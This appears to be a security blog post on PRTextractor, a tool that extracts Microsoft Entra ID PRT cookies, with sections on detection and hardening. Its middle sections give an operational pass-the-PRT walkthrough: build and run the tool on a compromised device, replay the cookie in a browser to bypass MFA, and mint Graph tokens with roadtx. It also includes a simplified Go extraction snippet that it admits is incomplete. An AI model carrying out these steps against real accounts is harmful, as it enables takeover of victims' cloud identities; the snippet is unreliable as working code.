PRTextractor: The Stealthy Go Tool That Extracts Entra ID PRT Cookies & Bypasses MFA + Video

Listen to this Post

🐢▶️ Listen🚀

Introduction

A new weapon has entered the red team arsenal. Security researcher Iván Cabrera Fresno recently unveiled PRTextractor, a Go-based tool designed to stealthily extract the `x-ms-RefreshTokenCredential` cookie (commonly known as the PRT cookie) from Microsoft Entra ID-joined Windows devices. The tool works by abusing a legitimate Windows COM interface, IProofOfPossessionCookieInfoManager, which is the same interface the Edge browser uses to obtain Single Sign-On cookies without re-authenticating. With this cookie in hand, an attacker can fully impersonate a user across Microsoft 365, Azure Portal, and other Entra ID-integrated services—effectively bypassing both passwords and Multi-Factor Authentication (MFA).

Learning Objectives

• Understand the role of the Primary Refresh Token (PRT) in Microsoft Entra ID authentication and its parallels to a Kerberos TGT.
• Learn how PRTextractor works, including its stealthy COM-based extraction method and its step-by-step workflow.
• Acquire hands-on skills to use PRTextractor in authorized red team exercises, import stolen cookies into a browser, and generate access tokens for lateral movement.
• Identify key detection and mitigation strategies against pass-the-PRT attacks, including Conditional Access token protection and TPM device binding.

You Should Know

1. How PRTextractor Extracts the PRT Cookie Without Touching LSASS

PRTextractor sets itself apart by being a pure, low-noise extraction tool. Unlike older techniques that rely on dumping the Local Security Authority Subsystem Service (LSASS) with tools like Mimikatz—a common trigger for endpoint detection and response (EDR) alerts—PRTextractor follows the same flow the Windows OS itself uses for SSO. This makes it incredibly stealthy.

The tool performs the following steps:

1. Registry Enumeration: Reads the Entra ID tenant ID and device ID from the Windows registry (HKLM\SYSTEM\...\CloudDomainJoin\JoinInfo and HKLM\SOFTWARE\...\AAD\Package). This step identifies the target device’s cloud identity and confirms if the PRT is TPM-protected.

2. Nonce Retrieval: Sends an HTTP POST request to `https://login.microsoftonline.com/oauth2/token` with the `grant_type=srv_challenge` parameter to obtain a nonce (a number used once) from Microsoft.

3. COM Interface Invocation: Calls the legitimate Windows COM interface `IProofOfPossessionCookieInfoManager` directly. It passes the nonce to the method GetCookieInfoForUri, which returns the PRT cookie. This is the same method that browsers use to get cookies automatically, so it appears as normal system activity.

4. JSON Output: The extracted cookie is saved in a JSON format that is immediately compatible with browser cookie management extensions like EditThisCookie or Cookie-Editor, making the replay attack trivial to execute.

What makes this stealthy? The tool performs no code injection, no LSASS dumping, and no kernel manipulation. It uses the legitimate Windows API exactly as Microsoft intended. From a detection standpoint, this activity is nearly indistinguishable from a user logging into their device.

1. Executing a Pass-the-PRT Attack with the Stolen Cookie

Once you have the JSON cookie from PRTextractor, you can perform a complete pass-the-PRT attack. The process is straightforward and highly effective. Here is a step-by-step guide to using the tool in an authorized penetration test:

Step 1: Compile or Download PRTextractor

PRTextractor is written in Go, which allows for easy cross-compilation. You can compile it from source:

git clone https://github.com/ivancabrera02/PRTextractor.git
cd PRTextractor
go build -o PRTextractor.exe

Alternatively, you can download a pre-compiled binary from the GitHub releases page.

Step 2: Run PRTextractor on the Target Windows Device

Assuming you have gained initial access to an Entra ID-joined device (e.g., via a phishing campaign or an unpatched vulnerability), execute the tool:

PRTextractor.exe

The output will be a JSON object similar to this:

{
"domain": "login.microsoftonline.com",
"hostOnly": false,
"httpOnly": false,
"name": "x-ms-RefreshTokenCredential",
"path": "/",
"sameSite": "no_restriction",
"secure": true,
"session": false,
"storeId": "0",
"value": "0.AY4A...AAA",
"id": 0
}

Step 3: Import the Cookie into a Browser

• Install a cookie management extension in Firefox or Chrome (e.g., Cookie-Editor).
• Open a new tab and navigate to `https://login.microsoftonline.com`.
  – Open the extension and choose “Import”.
  – Paste the entire JSON output from PRTextractor and save it.

  Step 4: Access Cloud Resources

  With the cookie now loaded, navigate to `https://portal.azure.com` or `https://myapps.microsoft.com`. The browser will automatically use the PRT cookie to authenticate you as the target user. You will have full access to all the victim’s cloud resources without ever entering a password or an MFA code.

Step 5: Generate Access Tokens for Lateral Movement (Optional)

For more advanced post-exploitation, use the extracted PRT cookie with tools like ROADtools Token eXchange (roadtx) to request specific access tokens. This is particularly useful for authenticating to APIs or the Microsoft Graph.

 First, convert the JSON cookie to a file (cookie.json)
 Then, use roadtx to get an access token
roadtx getaccesstoken --prt-cookie cookie.json --resource https://graph.microsoft.com

3. The Technical Magic: Abusing `IProofOfPossessionCookieInfoManager`

The core of PRTextractor lies in its abuse of a documented Windows COM interface. `IProofOfPossessionCookieInfoManager` is the interface that allows applications like Microsoft Edge to silently obtain SSO cookies for a logged-in user. It is designed to provide a seamless authentication experience, but it also creates a powerful attack vector.

When an attacker calls `GetCookieInfoForUri` with the correct parameters (including the nonce obtained from Microsoft’s servers), the COM interface returns the PRT cookie. The device has already proven possession of the private key associated with the device identity, and the COM interface acts as a trusted broker. This entire process is transparent to the user and to most security products, as it is simply the operating system performing its designed function.

The tool communicates with `login.microsoftonline.com` using the WinHTTP library, which means it has no external network dependencies beyond standard Windows HTTP calls. This further reduces its fingerprint on the network.

1. Hunting for PRT Theft: Blue Team Detection Strategies

For defenders, the stealthiness of PRTextractor presents a significant challenge. However, there are several detection strategies that can help identify PRT abuse:

Audit COM Object Instantiation

• Monitor for unusual processes (e.g., cmd.exe, powershell.exe, or non-browser binaries) instantiating the `IProofOfPossessionCookieInfoManager` COM object.
• Use Sysmon Event ID 7 (Image loaded) to track when `ProofOfPossessionCookieInfo.dll` is loaded into non-standard processes.

Analyze Login Patterns

• Look for authentication logs where the `user agent` or `device ID` suddenly changes. A PRT replayed from an attacker’s machine will often have a different browser fingerprint or operating system than the original device.
• In Entra ID sign-in logs, check the `Device info` and `Browser` fields for anomalies. A PRT cookie stolen from a Windows device but replayed from a Linux machine running a headless browser should trigger an alert.

Monitor for Nonce Requests

• A prerequisite for extracting the PRT is the `srv_challenge` request to login.microsoftonline.com/oauth2/token. While this is a legitimate API call, an unusually high frequency of these requests from a single host, especially from non-browser processes, may indicate automated extraction.

Endpoint Detection and Response (EDR) Rules

• Create EDR rules that detect attempts to access the registry keys used by PRTextractor (HKLM\SYSTEM\...\CloudDomainJoin\JoinInfo) from suspicious parent processes.
• Look for the execution of any binary named `PRTextractor.exe` or binaries that import `ProofOfPossessionCookieInfo.dll` and make WinHTTP calls to Microsoft login endpoints.

5. Hardening Entra ID Against Pass-the-PRT Attacks

While the pass-the-PRT technique is powerful, Microsoft has provided specific controls to mitigate it. The most effective protection is Conditional Access token protection (also known as device binding), which is currently in preview.

Token Protection (Device Binding)

• When token protection is enabled, the access token and refresh token are cryptographically bound to the device’s private key (usually stored in the TPM). Even if an attacker extracts the PRT cookie, they cannot use it from a different device because the token validation on Microsoft’s side will fail.
• To enable this feature, navigate to Azure AD > Security > Conditional Access > Token protection and configure a policy that requires token protection for sensitive applications.

Additional Mitigations

• Use TPM-bound keys: Ensure that all Entra ID-joined devices use a TPM (Trusted Platform Module) to store the device’s private key. While PRTextractor can still extract the PRT cookie, a properly configured token protection policy will render the cookie useless on any other device.
• Restrict local administrator privileges: Many token theft techniques require administrative rights to access LSASS or the CloudAP DLL. By enforcing least privilege and using tools like Microsoft Defender for Endpoint, you can limit the ability of an attacker to execute extraction tools.
• Implement risk-based Conditional Access policies: Use sign-in risk and user risk policies to challenge users when they attempt to log in from a new device, location, or IP address. This adds an extra layer of defense even if the PRT is stolen.
• Shorten token lifetimes: While this does not prevent theft, reducing the validity period of refresh tokens limits the window of opportunity for an attacker. Configure token lifetimes in Entra ID to be as short as your operational requirements allow.

6. Alternative Tools and Techniques for PRT Extraction

PRTextractor is not the only tool in this space. Red teams and attackers have several options for obtaining PRTs, each with its own trade-offs in terms of stealth, reliability, and ease of use.

Tool/Method	Technique	Stealth Level	Privileges Required
PRTextractor	COM interface (IProofOfPossessionCookieInfoManager)	Very High	User (non-admin)
aad_prt_bof	Beacon Object File (BOF) that interacts with the CloudAP DLL	High	Admin (for LSASS access)
Mimikatz (dpapi::cloudapkd)	Decrypts the PRT key material from the CloudAP DPAPI blob	Low (triggers many EDRs)	Admin
Get-AADIntUserPRTToken	Uses `BrowserCore.exe` to obtain the PRT cookie	Medium (depends on execution context)	User
Manual COM Invocation	Write a custom C or PowerShell script that calls the COM interface directly	High (if custom and signed)	User

PRTextractor’s advantage is that it works from a non-administrative user context and does not touch LSASS, making it one of the stealthiest options currently available.

7. Building Your Own PRT Extractor in Go

For those who want to understand the underlying mechanics, here is a simplified code snippet demonstrating how to call the COM interface in Go. This is the core of what PRTextractor does:

package main

import (
"fmt"
"syscall"
"unsafe"
)

func main() {
// Load the ProofOfPossessionCookieInfo DLL
dll := syscall.NewLazyDLL("ProofOfPossessionCookieInfo.dll")
proc := dll.NewProc("GetProofOfPossessionCookieInfo")

// The URI to request the cookie for (including the nonce)
uri := syscall.StringToUTF16Ptr("https://login.microsoftonline.com/...?sso_nonce=...")
var cookieInfo unsafe.Pointer

// Call the exported function
ret, _, _ := proc.Call(uintptr(unsafe.Pointer(uri)), uintptr(unsafe.Pointer(&cookieInfo)))

if ret == 0 { // S_OK
// Process the returned cookie
fmt.Println("Cookie extracted successfully")
// ... marshall the cookieInfo struct into a JSON object ...
} else {
fmt.Println("Failed to extract cookie")
}
}

In practice, the COM call is more complex, involving the `IProofOfPossessionCookieInfoManager` interface and proper error handling. The full source code of PRTextractor is available on GitHub and serves as an excellent reference for researchers.

What Undercode Say

• PRTextractor represents a paradigm shift in PRT theft, moving from noisy LSASS dumping to a stealthy, legitimate COM interface call that blends in with normal system activity.
• The tool is highly dangerous because it requires no administrative privileges, no code injection, and produces no obvious EDR triggers, making it an ideal post-exploitation tool.
• For blue teams, the primary detection vector is behavioral: monitor for non-browser processes instantiating SSO-related COM objects and analyze Entra ID sign-in logs for device fingerprint anomalies.
• The most effective long-term mitigation is Microsoft’s token protection (device binding), which cryptographically ties tokens to a specific device’s TPM, rendering stolen PRT cookies useless on other machines.
• Organizations should prioritize enabling token protection for Conditional Access policies, especially for administrative and privileged user accounts, as this directly neutralizes pass-the-PRT attacks.
• Red teams should add PRTextractor to their toolkits, but must be aware that reliance on the same technique by attackers means detection and response strategies will inevitably evolve to cover this vector.
• The open-source nature of the tool provides a valuable learning resource for both attackers and defenders to understand the intricacies of Entra ID authentication flows.

Prediction

The introduction of stealthy PRT extraction tools like PRTextractor will force Microsoft and the broader security community to accelerate the adoption of token protection and device binding as default settings rather than optional preview features. As these tools become more widely known and integrated into automated attack frameworks, we will see a surge in pass-the-PRT attacks targeting organizations that have not yet implemented Conditional Access token protection. This will likely lead to a “golden age” of identity-based cloud attacks, similar to the Kerberos Golden Ticket era in on-premises Active Directory. In response, EDR vendors will rush to add specific hooks and heuristics for COM interface abuse, and Microsoft will eventually make token protection mandatory for all Entra ID tenants. The cat-and-mouse game continues, but the balance is currently tipping in favor of the attacker.

▶️ Related Video (80% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Https: – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky